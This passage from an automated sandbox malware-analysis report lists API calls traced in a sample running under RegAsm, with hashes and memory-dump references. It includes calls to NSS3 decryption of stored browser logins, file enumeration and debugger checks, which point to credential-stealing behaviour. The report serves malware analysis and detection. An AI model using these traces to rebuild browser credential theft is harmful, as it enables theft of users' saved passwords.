                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C6E7C82
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E7CD2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C6E7DAF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeavememset
                                                                                                                                                                                                                                                    • String ID: Dul$Dul
                                                                                                                                                                                                                                                    • API String ID: 759993129-1496190512
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpystrlen
                                                                                                                                                                                                                                                    • String ID: (pre-xul)$data$name$schema$vul
                                                                                                                                                                                                                                                    • API String ID: 3412268980-3241126627
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD4F2
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD50B
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DCFE0: EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6DCFF6
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DCFE0: LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6DD026
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD52E
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6FD690
                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6FD6A6
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C6FD712
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C70D1C5), ref: 6C6FD751
                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C6FD7EA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                    • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00409139
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00409493,00000001,?,00001FA0,00000000,00000000,?,00409493), ref: 00409156
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(00409493,00000000,?,00409493), ref: 0040915E
                                                                                                                                                                                                                                                    • PK11_GetInternalKeySlot.NSS3(?,00409493), ref: 0040916C
                                                                                                                                                                                                                                                    • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00409493), ref: 00409181
                                                                                                                                                                                                                                                    • PK11SDR_Decrypt.NSS3(00000000,?,00000000), ref: 004091B5
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004091D1
                                                                                                                                                                                                                                                    • PK11_FreeSlot.NSS3 ref: 004091EB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(004268C6,004268CA), ref: 0040920D
                                                                                                                                                                                                                                                    • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00420448), ref: 00409214
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(004268C6,004268CB), ref: 0040922F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: K11_$Slot$Freelstrcat$AuthenticateBinaryCryptDecryptInternalStringlstrlenmemcpymemset
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2752138542-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 6C734EFF
                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C734F2E
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C734F52
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000), ref: 6C734F62
                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7352B2
                                                                                                                                                                                                                                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C7352E6
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000010), ref: 6C735481
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C735498
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                    • API String ID: 4104871533-3887548279
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C737046
                                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C737060
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C73707E
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a Time entry), ref: 6C6E81DE
                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C737096
                                                                                                                                                                                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C73709C
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 6C7370AA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004268E3,?,?,00000010), ref: 0040A8D3
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426AF8), ref: 0040A94C
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00426AFC), ref: 0040A966
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$FileFindFirstlstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: #$\*.*
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                    • String ID: -Infinity$NaN
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0041E59A
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041E5AF
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041E5BA
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041E5D6
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0041E5DD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                    • String ID: 8d
                                                                                                                                                                                                                                                    • API String ID: 2579439406-1695097073
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C748A4B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                    • String ID: ~qml
                                                                                                                                                                                                                                                    • API String ID: 2221118986-1807757901
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C7488F0
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C74925C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                    • String ID: ~qml
                                                                                                                                                                                                                                                    • API String ID: 2221118986-1807757901
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C748E18
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C74925C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                    • String ID: ~qml
                                                                                                                                                                                                                                                    • API String ID: 2221118986-1807757901
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C73B92D), ref: 6C6E9BC8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E9B80: __Init_thread_footer.LIBCMT ref: 6C6E9BDB
                                                                                                                                                                                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6E03D4,?), ref: 6C73B955
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73B9A5
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6C73BA20
                                                                                                                                                                                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6C73BA7B
                                                                                                                                                                                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C73BA81
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C73BA86
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
• Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1753913139-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C727A81
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C727A93
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: GetTickCount64.KERNEL32 ref: 6C6F5D40
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: EnterCriticalSection.KERNEL32(6C75F688), ref: 6C6F5D67
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C727AA1
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: __aulldiv.LIBCMT ref: 6C6F5DB4
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5C50: LeaveCriticalSection.KERNEL32(6C75F688), ref: 6C6F5DED
                                                                                                                                                                                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C727B31
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4054851604-0
                                                                                                                                                                                                                                                    • Opcode ID: e1fd05e28d3369e6c326de08176c128ac6d52a2484d149e8e8f016c3b9dcfad7
                                                                                                                                                                                                                                                    • Instruction ID: 2d81e90bce0113b10df84d724250e8b306fae7373eeac5399bad9fa343d28234
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1fd05e28d3369e6c326de08176c128ac6d52a2484d149e8e8f016c3b9dcfad7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2B1AF357083808BCB14CF25C65465FB7E2BFC9318F154A2CE995A7791DB74E90ACB82
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411604
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411613
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00404DDA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041161A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1871034439-0
                                                                                                                                                                                                                                                    • Opcode ID: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                    • Instruction ID: 595f2c6b6719244211eb639eaa3ba493da93b7b53b7c726cee41136c71f30a03
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5bc244c91944e159526dac87f2701fa0a5e61637d43ef5c594d15196ce9044e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F112171600219ABDB10CFA9ED85EEBB7ADFF4A351F10555AFE09D7200D772DC508AA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E57
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E66
                                                                                                                                                                                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E7D
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E8C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4291131564-0
                                                                                                                                                                                                                                                    • Opcode ID: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
                                                                                                                                                                                                                                                    • Instruction ID: 7ab1ffad65c7dba4725e6c1c771468f6b7f0824a729bdc84492a242d2b069b1f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76eab1d81b267eeb9c341b59845ce30e2d154f5e0b463ed0ce1362faa287e0e0
